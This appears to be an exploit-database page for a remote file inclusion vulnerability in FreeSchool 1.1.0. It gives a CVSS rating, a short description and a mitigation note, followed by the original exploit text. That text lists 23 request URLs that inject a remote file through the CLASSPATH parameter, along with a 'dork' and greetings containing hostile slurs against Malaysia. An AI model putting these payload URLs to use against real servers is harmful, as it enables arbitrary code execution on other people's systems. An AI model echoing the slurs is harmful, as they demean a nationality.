header-logo
Suggest Exploit
vendor:
FreeSchool
by:
cr4wl3r
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: FreeSchool
Affected Version From: 1.0.0
Affected Version To: 1.1.2000
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

FreeSchool <= 1.1.0 Mutiple Remote File Include Vulnerability

Multiple remote file inclusion vulnerabilities in FreeSchool 1.1.0 allow remote attackers to execute arbitrary PHP code via a URL in the CLASSPATH parameter to (1) biblioteca/bib_form.php, (2) biblioteca/bib_pldetails.php, (3) biblioteca/bib_plform.php, (4) biblioteca/bib_plsearchc.php, (5) biblioteca/bib_plsearchs.php, (6) biblioteca/bib_save.php, (7) biblioteca/bib_searchc.php, (8) biblioteca/bib_searchs.php, (9) biblioteca/edi_form.php, (10) biblioteca/edi_save.php, (11) biblioteca/gen_form.php, (12) biblioteca/gen_save.php, (13) biblioteca/lin_form.php, (14) biblioteca/lin_save.php, (15) biblioteca/luo_form.php, (16) biblioteca/luo_save.php, (17) biblioteca/sog_form.php, (18) biblioteca/sog_save.php, (19) calendario/cal_insert.php, (20) calendario/cal_save.php, or (21) calendario/cal_saveactivity.php.

Mitigation:

Upgrade to the latest version of FreeSchool.
Source

Exploit-DB raw data:

######################################################################
#[x] FreeSchool <= 1.1.0  Mutiple Remote File Include Vulnerability                    	  
#[!] Download Script      :  http://sourceforge.net/projects/freeschool/files/                      		  
#[!] Author               :  cr4wl3r                                   		  
#[!] Contact              :  cr4wl3r[4t]linuxmail[dot]org              		  
#[!] Location             :  Gorontalo - INDONESIA                     		  
#[!] Dork                 :  "FuCk y0u MaLaYsia"   		  
######################################################################

[x] 3xplo!t :                                                         		  
                                                                                  
http://localhost/[path]/biblioteca/bib_form.php?CLASSPATH=[AvriLhea]     
http://localhost/[path]/biblioteca/bib_pldetails.php?CLASSPATH=[AvriLhea]        
http://localhost/[path]/biblioteca/bib_plform.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/bib_plsearchc.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/bib_plsearchs.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/bib_save.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/bib_searchc.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/bib_searchs.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/edi_form.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/edi_save.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/gen_form.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/gen_save.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/lin_form.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/lin_save.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/luo_form.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/luo_save.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/sog_form.php?CLASSPATH=[AvriLhea]                
http://localhost/[path]/biblioteca/sog_save.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/calendario/cal_insert.php?CLASSPATH=[AvriLhea]                                                                
http://localhost/[path]/calendario/cal_save.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/calendario/cal_saveactivity.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/circolari/cir_save.php?CLASSPATH=[AvriLhea]                                                                
http://localhost/[path]/modulistica/mdl_save.php?CLASSPATH=[AvriLhea]

######################################################################
#[!] Greetz : MyMom [alm]  
#                                                                        
#[!] Special Thanks : str0ke, google, sourceforge, All MusLiM HacKers  
#
#[!] Thanks 2 : xoron, opt!x hacker, irvian, cyberlog
#
#[!] AlfaNet Cr3w GoRonTaLo : FaHry PunKs, RhyA HaMim, BoBy C00l, UyaN, ArYa.TaMa
#
#[!] My BiG BozZ MinJo.B0rj0e (YanG PunYa SepaRuH KaMpuNg Bugis, JaNgan LuPa Am-Am) :D
#
#[!] FuCk MaLaYsia, I HaTe MaLaYsia, h0w Ab0uT y0u??? 
#
#[!] sekuritionline.net | manadocoding.net                                          
######################################################################

# milw0rm.com [2009-09-03]